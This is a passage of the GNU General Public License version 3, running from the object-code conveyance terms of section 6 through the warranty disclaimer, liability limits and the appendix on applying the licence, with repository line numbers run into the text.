code by offering access from a designated 278 | place (gratis or for a charge), and offer equivalent access to the 279 | Corresponding Source in the same way through the same place at no 280 | further charge. You need not require recipients to copy the 281 | Corresponding Source along with the object code. If the place to 282 | copy the object code is a network server, the Corresponding Source 283 | may be on a different server (operated by you or a third party) 284 | that supports equivalent copying facilities, provided you maintain 285 | clear directions next to the object code saying where to find the 286 | Corresponding Source. Regardless of what server hosts the 287 | Corresponding Source, you remain obligated to ensure that it is 288 | available for as long as needed to satisfy these requirements. 289 | 290 | e) Convey the object code using peer-to-peer transmission, provided 291 | you inform other peers where the object code and Corresponding 292 | Source of the work are being offered to the general public at no 293 | charge under subsection 6d. 294 | 295 | A separable portion of the object code, whose source code is excluded 296 | from the Corresponding Source as a System Library, need not be 297 | included in conveying the object code work. 298 | 299 | A "User Product" is either (1) a "consumer product", which means any 300 | tangible personal property which is normally used for personal, family, 301 | or household purposes, or (2) anything designed or sold for incorporation 302 | into a dwelling. In determining whether a product is a consumer product, 303 | doubtful cases shall be resolved in favor of coverage. For a particular 304 | product received by a particular user, "normally used" refers to a 305 | typical or common use of that class of product, regardless of the status 306 | of the particular user or of the way in which the particular user 307 | actually uses, or expects or is expected to use, the product. A product 308 | is a consumer product regardless of whether the product has substantial 309 | commercial, industrial or non-consumer uses, unless such uses represent 310 | the only significant mode of use of the product. 311 | 312 | "Installation Information" for a User Product means any methods, 313 | procedures, authorization keys, or other information required to install 314 | and execute modified versions of a covered work in that User Product from 315 | a modified version of its Corresponding Source. The information must 316 | suffice to ensure that the continued functioning of the modified object 317 | code is in no case prevented or interfered with solely because 318 | modification has been made. 319 | 320 | If you convey an object code work under this section in, or with, or 321 | specifically for use in, a User Product, and the conveying occurs as 322 | part of a transaction in which the right of possession and use of the 323 | User Product is transferred to the recipient in perpetuity or for a 324 | fixed term (regardless of how the transaction is characterized), the 325 | Corresponding Source conveyed under this section must be accompanied 326 | by the Installation Information. But this requirement does not apply 327 | if neither you nor any third party retains the ability to install 328 | modified object code on the User Product (for example, the work has 329 | been installed in ROM). 330 | 331 | The requirement to provide Installation Information does not include a 332 | requirement to continue to provide support service, warranty, or updates 333 | for a work that has been modified or installed by the recipient, or for 334 | the User Product in which it has been modified or installed. Access to a 335 | network may be denied when the modification itself materially and 336 | adversely affects the operation of the network or violates the rules and 337 | protocols for communication across the network. 338 | 339 | Corresponding Source conveyed, and Installation Information provided, 340 | in accord with this section must be in a format that is publicly 341 | documented (and with an implementation available to the public in 342 | source code form), and must require no special password or key for 343 | unpacking, reading or copying. 344 | 345 | 7. Additional Terms. 346 | 347 | "Additional permissions" are terms that supplement the terms of this 348 | License by making exceptions from one or more of its conditions. 349 | Additional permissions that are applicable to the entire Program shall 350 | be treated as though they were included in this License, to the extent 351 | that they are valid under applicable law. If additional permissions 352 | apply only to part of the Program, that part may be used separately 353 | under those permissions, but the entire Program remains governed by 354 | this License without regard to the additional permissions. 355 | 356 | When you convey a copy of a covered work, you may at your option 357 | remove any additional permissions from that copy, or from any part of 358 | it. (Additional permissions may be written to require their own 359 | removal in certain cases when you modify the work.) You may place 360 | additional permissions on material, added by you to a covered work, 361 | for which you have or can give appropriate copyright permission. 362 | 363 | Notwithstanding any other provision of this License, for material you 364 | add to a covered work, you may (if authorized by the copyright holders of 365 | that material) supplement the terms of this License with terms: 366 | 367 | a) Disclaiming warranty or limiting liability differently from the 368 | terms of sections 15 and 16 of this License; or 369 | 370 | b) Requiring preservation of specified reasonable legal notices or 371 | author attributions in that material or in the Appropriate Legal 372 | Notices displayed by works containing it; or 373 | 374 | c) Prohibiting misrepresentation of the origin of that material, or 375 | requiring that modified versions of such material be marked in 376 | reasonable ways as different from the original version; or 377 | 378 | d) Limiting the use for publicity purposes of names of licensors or 379 | authors of the material; or 380 | 381 | e) Declining to grant rights under trademark law for use of some 382 | trade names, trademarks, or service marks; or 383 | 384 | f) Requiring indemnification of licensors and authors of that 385 | material by anyone who conveys the material (or modified versions of 386 | it) with contractual assumptions of liability to the recipient, for 387 | any liability that these contractual assumptions directly impose on 388 | those licensors and authors. 389 | 390 | All other non-permissive additional terms are considered "further 391 | restrictions" within the meaning of section 10. If the Program as you 392 | received it, or any part of it, contains a notice stating that it is 393 | governed by this License along with a term that is a further 394 | restriction, you may remove that term. If a license document contains 395 | a further restriction but permits relicensing or conveying under this 396 | License, you may add to a covered work material governed by the terms 397 | of that license document, provided that the further restriction does 398 | not survive such relicensing or conveying. 399 | 400 | If you add terms to a covered work in accord with this section, you 401 | must place, in the relevant source files, a statement of the 402 | additional terms that apply to those files, or a notice indicating 403 | where to find the applicable terms. 404 | 405 | Additional terms, permissive or non-permissive, may be stated in the 406 | form of a separately written license, or stated as exceptions; 407 | the above requirements apply either way. 408 | 409 | 8. Termination. 410 | 411 | You may not propagate or modify a covered work except as expressly 412 | provided under this License. Any attempt otherwise to propagate or 413 | modify it is void, and will automatically terminate your rights under 414 | this License (including any patent licenses granted under the third 415 | paragraph of section 11). 416 | 417 | However, if you cease all violation of this License, then your 418 | license from a particular copyright holder is reinstated (a) 419 | provisionally, unless and until the copyright holder explicitly and 420 | finally terminates your license, and (b) permanently, if the copyright 421 | holder fails to notify you of the violation by some reasonable means 422 | prior to 60 days after the cessation. 423 | 424 | Moreover, your license from a particular copyright holder is 425 | reinstated permanently if the copyright holder notifies you of the 426 | violation by some reasonable means, this is the first time you have 427 | received notice of violation of this License (for any work) from that 428 | copyright holder, and you cure the violation prior to 30 days after 429 | your receipt of the notice. 430 | 431 | Termination of your rights under this section does not terminate the 432 | licenses of parties who have received copies or rights from you under 433 | this License. If your rights have been terminated and not permanently 434 | reinstated, you do not qualify to receive new licenses for the same 435 | material under section 10. 436 | 437 | 9. Acceptance Not Required for Having Copies. 438 | 439 | You are not required to accept this License in order to receive or 440 | run a copy of the Program. Ancillary propagation of a covered work 441 | occurring solely as a consequence of using peer-to-peer transmission 442 | to receive a copy likewise does not require acceptance. However, 443 | nothing other than this License grants you permission to propagate or 444 | modify any covered work. These actions infringe copyright if you do 445 | not accept this License. Therefore, by modifying or propagating a 446 | covered work, you indicate your acceptance of this License to do so. 447 | 448 | 10. Automatic Licensing of Downstream Recipients. 449 | 450 | Each time you convey a covered work, the recipient automatically 451 | receives a license from the original licensors, to run, modify and 452 | propagate that work, subject to this License. You are not responsible 453 | for enforcing compliance by third parties with this License. 454 | 455 | An "entity transaction" is a transaction transferring control of an 456 | organization, or substantially all assets of one, or subdividing an 457 | organization, or merging organizations. If propagation of a covered 458 | work results from an entity transaction, each party to that 459 | transaction who receives a copy of the work also receives whatever 460 | licenses to the work the party's predecessor in interest had or could 461 | give under the previous paragraph, plus a right to possession of the 462 | Corresponding Source of the work from the predecessor in interest, if 463 | the predecessor has it or can get it with reasonable efforts. 464 | 465 | You may not impose any further restrictions on the exercise of the 466 | rights granted or affirmed under this License. For example, you may 467 | not impose a license fee, royalty, or other charge for exercise of 468 | rights granted under this License, and you may not initiate litigation 469 | (including a cross-claim or counterclaim in a lawsuit) alleging that 470 | any patent claim is infringed by making, using, selling, offering for 471 | sale, or importing the Program or any portion of it. 472 | 473 | 11. Patents. 474 | 475 | A "contributor" is a copyright holder who authorizes use under this 476 | License of the Program or a work on which the Program is based. The 477 | work thus licensed is called the contributor's "contributor version". 478 | 479 | A contributor's "essential patent claims" are all patent claims 480 | owned or controlled by the contributor, whether already acquired or 481 | hereafter acquired, that would be infringed by some manner, permitted 482 | by this License, of making, using, or selling its contributor version, 483 | but do not include claims that would be infringed only as a 484 | consequence of further modification of the contributor version. For 485 | purposes of this definition, "control" includes the right to grant 486 | patent sublicenses in a manner consistent with the requirements of 487 | this License. 488 | 489 | Each contributor grants you a non-exclusive, worldwide, royalty-free 490 | patent license under the contributor's essential patent claims, to 491 | make, use, sell, offer for sale, import and otherwise run, modify and 492 | propagate the contents of its contributor version. 493 | 494 | In the following three paragraphs, a "patent license" is any express 495 | agreement or commitment, however denominated, not to enforce a patent 496 | (such as an express permission to practice a patent or covenant not to 497 | sue for patent infringement). To "grant" such a patent license to a 498 | party means to make such an agreement or commitment not to enforce a 499 | patent against the party. 500 | 501 | If you convey a covered work, knowingly relying on a patent license, 502 | and the Corresponding Source of the work is not available for anyone 503 | to copy, free of charge and under the terms of this License, through a 504 | publicly available network server or other readily accessible means, 505 | then you must either (1) cause the Corresponding Source to be so 506 | available, or (2) arrange to deprive yourself of the benefit of the 507 | patent license for this particular work, or (3) arrange, in a manner 508 | consistent with the requirements of this License, to extend the patent 509 | license to downstream recipients. "Knowingly relying" means you have 510 | actual knowledge that, but for the patent license, your conveying the 511 | covered work in a country, or your recipient's use of the covered work 512 | in a country, would infringe one or more identifiable patents in that 513 | country that you have reason to believe are valid. 514 | 515 | If, pursuant to or in connection with a single transaction or 516 | arrangement, you convey, or propagate by procuring conveyance of, a 517 | covered work, and grant a patent license to some of the parties 518 | receiving the covered work authorizing them to use, propagate, modify 519 | or convey a specific copy of the covered work, then the patent license 520 | you grant is automatically extended to all recipients of the covered 521 | work and works based on it. 522 | 523 | A patent license is "discriminatory" if it does not include within 524 | the scope of its coverage, prohibits the exercise of, or is 525 | conditioned on the non-exercise of one or more of the rights that are 526 | specifically granted under this License. You may not convey a covered 527 | work if you are a party to an arrangement with a third party that is 528 | in the business of distributing software, under which you make payment 529 | to the third party based on the extent of your activity of conveying 530 | the work, and under which the third party grants, to any of the 531 | parties who would receive the covered work from you, a discriminatory 532 | patent license (a) in connection with copies of the covered work 533 | conveyed by you (or copies made from those copies), or (b) primarily 534 | for and in connection with specific products or compilations that 535 | contain the covered work, unless you entered into that arrangement, 536 | or that patent license was granted, prior to 28 March 2007. 537 | 538 | Nothing in this License shall be construed as excluding or limiting 539 | any implied license or other defenses to infringement that may 540 | otherwise be available to you under applicable patent law. 541 | 542 | 12. No Surrender of Others' Freedom. 543 | 544 | If conditions are imposed on you (whether by court order, agreement or 545 | otherwise) that contradict the conditions of this License, they do not 546 | excuse you from the conditions of this License. If you cannot convey a 547 | covered work so as to satisfy simultaneously your obligations under this 548 | License and any other pertinent obligations, then as a consequence you may 549 | not convey it at all. For example, if you agree to terms that obligate you 550 | to collect a royalty for further conveying from those to whom you convey 551 | the Program, the only way you could satisfy both those terms and this 552 | License would be to refrain entirely from conveying the Program. 553 | 554 | 13. Use with the GNU Affero General Public License. 555 | 556 | Notwithstanding any other provision of this License, you have 557 | permission to link or combine any covered work with a work licensed 558 | under version 3 of the GNU Affero General Public License into a single 559 | combined work, and to convey the resulting work. The terms of this 560 | License will continue to apply to the part which is the covered work, 561 | but the special requirements of the GNU Affero General Public License, 562 | section 13, concerning interaction through a network will apply to the 563 | combination as such. 564 | 565 | 14. Revised Versions of this License. 566 | 567 | The Free Software Foundation may publish revised and/or new versions of 568 | the GNU General Public License from time to time. Such new versions will 569 | be similar in spirit to the present version, but may differ in detail to 570 | address new problems or concerns. 571 | 572 | Each version is given a distinguishing version number. If the 573 | Program specifies that a certain numbered version of the GNU General 574 | Public License "or any later version" applies to it, you have the 575 | option of following the terms and conditions either of that numbered 576 | version or of any later version published by the Free Software 577 | Foundation. If the Program does not specify a version number of the 578 | GNU General Public License, you may choose any version ever published 579 | by the Free Software Foundation. 580 | 581 | If the Program specifies that a proxy can decide which future 582 | versions of the GNU General Public License can be used, that proxy's 583 | public statement of acceptance of a version permanently authorizes you 584 | to choose that version for the Program. 585 | 586 | Later license versions may give you additional or different 587 | permissions. However, no additional obligations are imposed on any 588 | author or copyright holder as a result of your choosing to follow a 589 | later version. 590 | 591 | 15. Disclaimer of Warranty. 592 | 593 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY 594 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT 595 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY 596 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, 597 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 598 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM 599 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF 600 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 601 | 602 | 16. Limitation of Liability. 603 | 604 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 605 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS 606 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY 607 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE 608 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF 609 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD 610 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), 611 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF 612 | SUCH DAMAGES. 613 | 614 | 17. Interpretation of Sections 15 and 16. 615 | 616 | If the disclaimer of warranty and limitation of liability provided 617 | above cannot be given local legal effect according to their terms, 618 | reviewing courts shall apply local law that most closely approximates 619 | an absolute waiver of all civil liability in connection with the 620 | Program, unless a warranty or assumption of liability accompanies a 621 | copy of the Program in return for a fee. 622 | 623 | END OF TERMS AND CONDITIONS 624 | 625 | How to Apply These Terms to Your New Programs 626 | 627 | If you develop a new program, and you want it to be of the greatest 628 | possible use to the public, the best way to achieve this is to make it 629 | free software which everyone can redistribute and change under these terms. 630 | 631 | To do so, attach the following notices to the program. It is safest 632 | to attach them to the start of each source file to most effectively 633 | state the exclusion of warranty; and each file should have at least 634 | the "copyright" line and a pointer to where the full notice is found. 635 | 636 | 637 | Copyright (C) 638 | 639 | This program is free software: you can redistribute it and/or modify 640 | it under the terms of the GNU General Public License as published by 641 | the Free Software Foundation, either version 3 of the License, or 642 | (at your option) any later version. 643 | 644 | This program is distributed in the hope that it will be useful, 645 | but WITHOUT ANY WARRANTY; without even the implied warranty of 646 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 647 | GNU General Public License for more details. 648 | 649 | You should have received a copy of the GNU General Public License 650 | along with this program. If not, see . 651 | 652 | Also add information on how to contact you by electronic and paper mail. 653 | 654 | If the program does terminal interaction, make it output a short 655 | notice like this when it starts in an interactive mode: 656 | 657 | Copyright (C) 658 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 659 | This is free software, and you are welcome to redistribute it 660 | under certain conditions; type `show c' for details. 661 | 662 | The hypothetical commands `show w' and `show c' should show the appropriate 663 | parts of the General Public License. Of course, your program's commands 664 | might be different; for a GUI interface, you would use an "about box". 665 | 666 | You should also get your employer (if you work as a programmer) or school, 667 | if any, to sign a "copyright disclaimer" for the program, if necessary. 668 | For more information on this, and how to apply and follow the GNU GPL, see 669 | . 670 | 671 | The GNU General Public License does not permit incorporating your program 672 | into proprietary programs. If your program is a subroutine library, you 673 | may consider it more useful to permit linking proprietary applications with 674 | the library. If this is what you want to do, use the GNU Lesser General 675 | Public License instead of this License. But first, please read 676 | . 677 | --------------------------------------------------------------------------------